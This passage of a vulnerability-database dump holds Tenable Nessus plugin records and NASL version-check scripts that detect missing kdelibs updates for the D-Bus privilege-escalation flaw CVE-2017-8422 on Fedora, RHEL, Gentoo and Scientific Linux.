CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "Fedora 24 : 6:kdelibs (2017-8b4898ce81)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:6:kdelibs", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-8B4898CE81.NASL", "href": "https://www.tenable.com/plugins/nessus/100229", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-8b4898ce81.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100229);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"FEDORA\", value:\"2017-8b4898ce81\");\n\n script_name(english:\"Fedora 24 : 6:kdelibs (2017-8b4898ce81)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-8b4898ce81\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-1.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 6:kdelibs package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:6:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"kdelibs-4.14.30-2.fc24\", epoch:\"6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"6:kdelibs\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:28", "description": "An update for kdelibs is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe K Desktop Environment (KDE) is a graphical desktop environment for the X Window System. The kdelibs packages include core libraries for the K Desktop Environment.\n\nSecurity Fix(es) :\n\n* A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting this issue.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-23T00:00:00", "type": "nessus", "title": "RHEL 7 : kdelibs (RHSA-2017:1264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kdelibs", "p-cpe:/a:redhat:enterprise_linux:kdelibs-apidocs", "p-cpe:/a:redhat:enterprise_linux:kdelibs-common", "p-cpe:/a:redhat:enterprise_linux:kdelibs-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kdelibs-devel", "p-cpe:/a:redhat:enterprise_linux:kdelibs-ktexteditor", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2017-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/100345", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1264. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100345);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"RHSA\", value:\"2017:1264\");\n\n script_name(english:\"RHEL 7 : kdelibs (RHSA-2017:1264)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kdelibs is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe K Desktop Environment (KDE) is a graphical desktop environment for\nthe X Window System. The kdelibs packages include core libraries for\nthe K Desktop Environment.\n\nSecurity Fix(es) :\n\n* A privilege escalation flaw was found in the way kdelibs handled\nD-Bus messages. A local user could potentially use this flaw to gain\nroot privileges by spoofing a callerID and leveraging a privileged\nhelper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting\nthis issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1264\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-8422\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdelibs-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdelibs-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdelibs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdelibs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdelibs-ktexteditor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1264\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"kdelibs-4.14.8-6.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kdelibs-apidocs-4.14.8-6.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kdelibs-common-4.14.8-6.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kdelibs-common-4.14.8-6.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kdelibs-debuginfo-4.14.8-6.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kdelibs-devel-4.14.8-6.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kdelibs-ktexteditor-4.14.8-6.el7_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs / kdelibs-apidocs / kdelibs-common / kdelibs-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:12", "description": "The remote host is affected by the vulnerability described in GLSA-201706-29 (KAuth and KDELibs: Privilege escalation)\n\n KAuth and KDELibs contains a logic flaw in which the service invoking D-Bus is not properly checked. This allows spoofing the identity of the caller and with some carefully crafted calls can lead to gaining root from an unprivileged account.\n Impact :\n\n A local attacker could spoof the identity of the caller invoking D-Bus, possibly resulting in gaining privileges.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-28T00:00:00", "type": "nessus", "title": "GLSA-201706-29 : KAuth and KDELibs: Privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:kauth", "p-cpe:/a:gentoo:linux:kdelibs", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201706-29.NASL", "href": "https://www.tenable.com/plugins/nessus/101075", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201706-29.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101075);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"GLSA\", value:\"201706-29\");\n\n script_name(english:\"GLSA-201706-29 : KAuth and KDELibs: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201706-29\n(KAuth and KDELibs: Privilege escalation)\n\n KAuth and KDELibs contains a logic flaw in which the service invoking\n D-Bus is not properly checked. This allows spoofing the identity of the\n caller and with some carefully crafted calls can lead to gaining root\n from an unprivileged account.\n \nImpact :\n\n A local attacker could spoof the identity of the caller invoking D-Bus,\n possibly resulting in gaining privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201706-29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All KAuth users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=kde-frameworks/kauth-5.29.0-r1'\n All KDELibs users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=kde-frameworks/kdelibs-4.14.32'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:kauth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"kde-frameworks/kauth\", unaffected:make_list(\"ge 5.29.0-r1\"), vulnerable:make_list(\"lt 5.29.0-r1\"))) flag++;\nif (qpkg_check(package:\"kde-frameworks/kdelibs\", unaffected:make_list(\"ge 4.14.32\"), vulnerable:make_list(\"lt 4.14.32\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"KAuth and KDELibs\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:00", "description": "security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-16T00:00:00", "type": "nessus", "title": "Fedora 25 : 6:kdelibs (2017-aff6f6bd9d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:6:kdelibs", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-AFF6F6BD9D.NASL", "href": "https://www.tenable.com/plugins/nessus/100197", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-aff6f6bd9d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100197);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"FEDORA\", value:\"2017-aff6f6bd9d\");\n\n script_name(english:\"Fedora 25 : 6:kdelibs (2017-aff6f6bd9d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"security fix for CVE-2017-8422.\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-aff6f6bd9d\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-1.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 6:kdelibs package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:6:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"kdelibs-4.14.30-2.fc25\", epoch:\"6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"6:kdelibs\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:33", "description": "Security Fix(es) :\n\n - A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application.\n (CVE-2017-8422)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-23T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kdelibs on SL7.x x86_64 (20170522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kdelibs", "p-cpe:/a:fermilab:scientific_linux:kdelibs-apidocs", "p-cpe:/a:fermilab:scientific_linux:kdelibs-common", "p-cpe:/a:fermilab:scientific_linux:kdelibs-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kdelibs-devel", "p-cpe:/a:fermilab:scientific_linux:kdelibs-ktexteditor", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170522_KDELIBS_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/100349", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100349);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-8422\");\n\n script_name(english:\"Scientific Linux Security Update : kdelibs on SL7.x x86_64 (20170522)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A privilege escalation flaw was found in the way kdelibs\n handled D-Bus messages. A local user could potentially\n use this flaw to gain root privileges by spoofing a\n callerID and leveraging a privileged helper application.\n (CVE-2017-8422)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1705&L=scientific-linux-errata&F=&S=&P=6240\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5841790\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kdelibs-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kdelibs-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kdelibs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kdelibs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kdelibs-ktexteditor\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n 